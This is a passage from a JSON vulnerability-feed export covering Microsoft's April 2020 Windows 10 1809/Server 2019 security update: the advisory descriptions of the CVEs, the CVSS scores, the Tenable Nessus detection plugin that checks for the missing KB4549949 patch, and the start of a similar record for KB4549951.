(CVE-2020-1094)\n\n - An information disclosure vulnerability exists when certain central processing units (CPU) speculatively access memory. An attacker who successfully exploited the vulnerability could read privileged data across trust boundaries. (CVE-2020-0955)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-0948, CVE-2020-0949, CVE-2020-0950)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited the vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the Microsoft Windows Update Client when it does not properly handle privileges. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-1014)\n\n - A denial of service vulnerability exists when Windows improperly handles objects in memory. An attacker who successfully exploited the vulnerability could cause a target system to stop responding. (CVE-2020-0794)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. 
An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the way that the User-Mode Power Service (UMPS) handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1015)\n\n - An elevation of privilege vulnerability exists when the Windows Delivery Optimization service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0983)\n\n - An elevation of privilege vulnerability exists in the way the Windows Push Notification Service handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-0940, CVE-2020-1001, CVE-2020-1006, CVE-2020-1017)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0958)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. 
An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0982, CVE-2020-0987, CVE-2020-1005)\n\n - An information disclosure vulnerability exists when the Windows Push Notification Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An authenticated attacker could exploit this vulnerability by running a specially crafted application. The update addresses the vulnerability by correcting how the Windows Push Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0895, CVE-2020-0966, CVE-2020-0967)\n\n - An elevation of privilege vulnerability exists when Windows Hyper-V on a host server fails to properly handle objects in memory. An attacker who successfully exploited these vulnerabilities could gain elevated privileges on a target operating system. This vulnerability by itself does not allow arbitrary code to be run. However, this vulnerability could be used in conjunction with one or more vulnerabilities (e.g. a remote code execution vulnerability and another elevation of privilege) that could take advantage of the elevated privileges when running. The update addresses the vulnerabilities by correcting how Windows Hyper-V handles objects in memory. (CVE-2020-0917, CVE-2020-0918)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. 
An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0952)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0913, CVE-2020-1000, CVE-2020-1003)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0784, CVE-2020-0888)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0964)\n\n - A denial of service vulnerability exists in Windows DNS when it fails to properly handle queries. An attacker who successfully exploited this vulnerability could cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An elevation of privilege vulnerability exists when the Windows System Assessment Tool improperly handles file operations. 
An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows System Assessment Tool handles file operations. (CVE-2020-1011)\n\n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. 
(CVE-2020-0969, CVE-2020-0970)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-14T00:00:00", "type": "nessus", "title": "KB4549949: Windows 10 Version 1809 and Windows Server 2019 April 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0687", "CVE-2020-0699", "CVE-2020-0784", "CVE-2020-0794", "CVE-2020-0821", "CVE-2020-0888", "CVE-2020-0889", "CVE-2020-0895", "CVE-2020-0907", "CVE-2020-0910", "CVE-2020-0913", "CVE-2020-0917", "CVE-2020-0918", "CVE-2020-0934", "CVE-2020-0936", "CVE-2020-0937", "CVE-2020-0938", "CVE-2020-0940", "CVE-2020-0942", "CVE-2020-0944", "CVE-2020-0945", "CVE-2020-0946", "CVE-2020-0948", "CVE-2020-0949", "CVE-2020-0950", "CVE-2020-0952", "CVE-2020-0953", "CVE-2020-0955", "CVE-2020-0956", "CVE-2020-0958", "CVE-2020-0959", "CVE-2020-0960", "CVE-2020-0962", "CVE-2020-0964", "CVE-2020-0965", "CVE-2020-0966", "CVE-2020-0967", "CVE-2020-0968", "CVE-2020-0969", "CVE-2020-0970", "CVE-2020-0982", "CVE-2020-0983", "CVE-2020-0985", "CVE-2020-0987", "CVE-2020-0988", "CVE-2020-0992", "CVE-2020-0993", "CVE-2020-0994", "CVE-2020-0995", 
"CVE-2020-0996", "CVE-2020-0999", "CVE-2020-1000", "CVE-2020-1001", "CVE-2020-1003", "CVE-2020-1004", "CVE-2020-1005", "CVE-2020-1006", "CVE-2020-1007", "CVE-2020-1008", "CVE-2020-1009", "CVE-2020-1011", "CVE-2020-1014", "CVE-2020-1015", "CVE-2020-1016", "CVE-2020-1017", "CVE-2020-1020", "CVE-2020-1027", "CVE-2020-1029", "CVE-2020-1094"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_APR_4549949.NASL", "href": "https://www.tenable.com/plugins/nessus/135463", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135463);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-0687\",\n \"CVE-2020-0699\",\n \"CVE-2020-0784\",\n \"CVE-2020-0794\",\n \"CVE-2020-0821\",\n \"CVE-2020-0888\",\n \"CVE-2020-0889\",\n \"CVE-2020-0895\",\n \"CVE-2020-0907\",\n \"CVE-2020-0910\",\n \"CVE-2020-0913\",\n \"CVE-2020-0917\",\n \"CVE-2020-0918\",\n \"CVE-2020-0934\",\n \"CVE-2020-0936\",\n \"CVE-2020-0937\",\n \"CVE-2020-0938\",\n \"CVE-2020-0940\",\n \"CVE-2020-0942\",\n \"CVE-2020-0944\",\n \"CVE-2020-0945\",\n \"CVE-2020-0946\",\n \"CVE-2020-0948\",\n \"CVE-2020-0949\",\n \"CVE-2020-0950\",\n \"CVE-2020-0952\",\n \"CVE-2020-0953\",\n \"CVE-2020-0955\",\n \"CVE-2020-0956\",\n \"CVE-2020-0958\",\n \"CVE-2020-0959\",\n \"CVE-2020-0960\",\n \"CVE-2020-0962\",\n \"CVE-2020-0964\",\n \"CVE-2020-0965\",\n \"CVE-2020-0966\",\n \"CVE-2020-0967\",\n \"CVE-2020-0968\",\n \"CVE-2020-0969\",\n \"CVE-2020-0970\",\n \"CVE-2020-0982\",\n \"CVE-2020-0983\",\n \"CVE-2020-0985\",\n \"CVE-2020-0987\",\n \"CVE-2020-0988\",\n \"CVE-2020-0992\",\n \"CVE-2020-0993\",\n \"CVE-2020-0994\",\n \"CVE-2020-0995\",\n 
\"CVE-2020-0996\",\n \"CVE-2020-0999\",\n \"CVE-2020-1000\",\n \"CVE-2020-1001\",\n \"CVE-2020-1003\",\n \"CVE-2020-1004\",\n \"CVE-2020-1005\",\n \"CVE-2020-1006\",\n \"CVE-2020-1007\",\n \"CVE-2020-1008\",\n \"CVE-2020-1009\",\n \"CVE-2020-1011\",\n \"CVE-2020-1014\",\n \"CVE-2020-1015\",\n \"CVE-2020-1016\",\n \"CVE-2020-1017\",\n \"CVE-2020-1020\",\n \"CVE-2020-1027\",\n \"CVE-2020-1029\",\n \"CVE-2020-1094\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0139-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0156-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"MSKB\", value:\"4549949\");\n script_xref(name:\"MSFT\", value:\"MS20-4549949\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0031\");\n\n script_name(english:\"KB4549949: Windows 10 Version 1809 and Windows Server 2019 April 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4549949.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n Windows Update Stack fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0985, CVE-2020-0996)\n\n - An elevation of privilege vulnerability exists when a\n Windows scheduled task improperly handles file\n redirections. An attacker who successfully exploited\n this vulnerability could delete a targeted file they\n would not have permissions to. 
(CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0821, CVE-2020-1007)\n\n - An elevation of privilege vulnerability exists when the\n Windows WpcDesktopMonSvc improperly manages memory.\n (CVE-2020-0934)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0699, CVE-2020-0962)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959,\n CVE-2020-0960, CVE-2020-0988, CVE-2020-0992,\n CVE-2020-0994, CVE-2020-0995, CVE-2020-0999,\n CVE-2020-1008)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. 
An attacker who\n successfully exploited this vulnerability could\n overwrite files in arbitrary locations with elevated\n permissions. (CVE-2020-0942)\n\n - A remoted code execution vulnerability exists in the way\n that Microsoft Windows Codecs Library handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code. Exploitation\n of the vulnerability requires that a program process a\n specially crafted image file. The update addresses the\n vulnerability by correcting how Microsoft Windows Codecs\n Library handles objects in memory. (CVE-2020-0965)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The security\n update addresses the vulnerability by correcting how the\n Connected User Experiences and Telemetry Service handles\n file operations. (CVE-2020-0944, CVE-2020-1029)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-0937,\n CVE-2020-0945, CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in the\n way that the Microsoft Store Install Service handles\n file operations in protected locations. An attacker who\n successfully exploited the vulnerability could execute\n code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles a specially-crafted multi-\n master font - Adobe Type 1 PostScript format. 
For all\n systems except Windows 10, an attacker who successfully\n exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who\n successfully exploited the vulnerability could execute\n code in an AppContainer sandbox context with limited\n privileges and capabilities. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as convincing a user to open a\n specially crafted document or viewing it in the Windows\n Preview pane. The update addresses the vulnerability by\n correcting how the Windows Adobe Type Manager Library\n handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2020-0910)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-1094)\n\n - An information disclosure vulnerability exists when\n certain central processing units (CPU) speculatively\n access memory. An attacker who successfully exploited\n the vulnerability could read privileged data across\n trust boundaries. 
(CVE-2020-0955)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-0948,\n CVE-2020-0949, CVE-2020-0950)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Windows Update Client when it does not\n properly handle privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1014)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-0794)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. 
An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the\n way that the User-Mode Power Service (UMPS) handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1015)\n\n - An elevation of privilege vulnerability exists when the\n Windows Delivery Optimization service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code\n with elevated system privileges. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0983)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Push Notification Service handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-0940,\n CVE-2020-1001, CVE-2020-1006, CVE-2020-1017)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0958)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. 
(CVE-2020-0982,\n CVE-2020-0987, CVE-2020-1005)\n\n - An information disclosure vulnerability exists when the\n Windows Push Notification Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. An authenticated\n attacker could exploit this vulnerability by running a\n specially crafted application. The update addresses the\n vulnerability by correcting how the Windows Push\n Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0895, CVE-2020-0966,\n CVE-2020-0967)\n\n - An elevation of privilege vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n handle objects in memory. An attacker who successfully\n exploited these vulnerabilities could gain elevated\n privileges on a target operating system. This\n vulnerability by itself does not allow arbitrary code to\n be run. However, this vulnerability could be used in\n conjunction with one or more vulnerabilities (e.g. a\n remote code execution vulnerability and another\n elevation of privilege) that could take advantage of the\n elevated privileges when running. The update addresses\n the vulnerabilities by correcting how Windows Hyper-V\n handles objects in memory. (CVE-2020-0917,\n CVE-2020-0918)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. 
There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0952)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0913, CVE-2020-1000, CVE-2020-1003)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0784, CVE-2020-0888)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0964)\n\n - A denial of service vulnerability exists in Windows DNS\n when it fails to properly handle queries. An attacker\n who successfully exploited this vulnerability could\n cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An elevation of privilege vulnerability exists when the\n Windows System Assessment Tool improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. 
An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows System Assessment Tool\n handles file operations. (CVE-2020-1011)\n\n - A remote code execution vulnerability exists in the way \n that the ChakraCore scripting engine handles objects in \n memory. The vulnerability could corrupt memory in such a \n way that an attacker could execute arbitrary code in the \n context of the current user. An attacker who successfully \n exploited the vulnerability could gain the same user \n rights as the current user. If the current user is logged \n on with administrative user rights, an attacker who \n successfully exploited the vulnerability could take \n control of an affected system. An attacker could then \n install programs; view, change, or delete data; or create \n new accounts with full user rights. (CVE-2020-0969, \n CVE-2020-0970)\");\n # https://support.microsoft.com/en-us/help/4549949/windows-10-update-kb4549949\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3387c2f7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4549949.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1008\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1020\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", 
value:\"2020/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-04\";\nkbs = make_list('4549949');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"17763\",\n rollup_date:\"04_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4549949])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 
hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-05T14:15:23", "description": "The remote Windows host is missing security update 4549951.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the Windows Update Stack fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0985, CVE-2020-0996)\n\n - An elevation of privilege vulnerability exists when a Windows scheduled task improperly handles file redirections. An attacker who successfully exploited this vulnerability could delete a targeted file they would not have permissions to. (CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0821, CVE-2020-1007)\n\n - An elevation of privilege vulnerability exists when the Windows WpcDesktopMonSvc improperly manages memory.\n (CVE-2020-0934)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. 
(CVE-2020-0699, CVE-2020-0962)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959, CVE-2020-0960, CVE-2020-0988, CVE-2020-0992, CVE-2020-0994, CVE-2020-0995, CVE-2020-0999, CVE-2020-1008)\n\n - A remoted code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code. Exploitation of the vulnerability requires that a program process a specially crafted image file. The update addresses the vulnerability by correcting how Microsoft Windows Codecs Library handles objects in memory. (CVE-2020-0965)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The security update addresses the vulnerability by correcting how the Connected User Experiences and Telemetry Service handles file operations. (CVE-2020-0944, CVE-2020-1029)\n\n - An elevation of privilege vulnerability exists in the way that the Microsoft Store Install Service handles file operations in protected locations. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. 
(CVE-2020-1009)\n\n - A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi- master font - Adobe Type 1 PostScript format. For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who successfully exploited the vulnerability could execute code in an AppContainer sandbox context with limited privileges and capabilities. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane. The update addresses the vulnerability by correcting how the Windows Adobe Type Manager Library handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-0948, CVE-2020-0949, CVE-2020-0950)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. 
